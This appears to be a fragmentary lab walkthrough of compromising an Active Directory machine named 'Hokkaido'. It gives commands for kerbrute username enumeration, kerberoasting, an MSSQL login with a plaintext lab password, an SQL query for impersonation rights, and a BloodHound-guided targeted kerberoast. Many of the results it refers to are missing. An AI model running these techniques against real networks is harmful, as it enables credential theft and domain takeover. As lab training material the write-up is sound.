Hokkaido
Using kerbrute for bruteforcing usernames:
kerbrute userenum --dc 192.168.212.40 -d hokkaido-aerospace.com /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt --downgradeWe get usernames:
Now bruteforcing passwords with the usernames:
\
Now we can try kerberoasting with this account:
GetUserSPNs.py hokkaido-aerospace.com/info:info -request
We get two hashes but they are uncrackable:
Now checking SYSVOL share for scripts:
Now we get a password so spraying it:
Now using discovery user we can login to Mssql:
mssqlclient.py -windows-auth -dc-ip 192.168.212.40 hokkaido-aerospace.com/discovery:'Start123!'@192.168.212.40Now checking for impersonation:
SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'
Now to impersonate:
Now checking:
Now checking databases:
Checking all tables:


Now with the creds we can run bloodhound:
Checking outbound transitive object control we have generic write over hazel. Doing a targeted kerberoast:
Only hazel's hash gets cracked. 
We belong to Tier2-Admins and we have GenericWrite access over Administrators:
But doesn't work for some reason
Last updated
Was this helpful?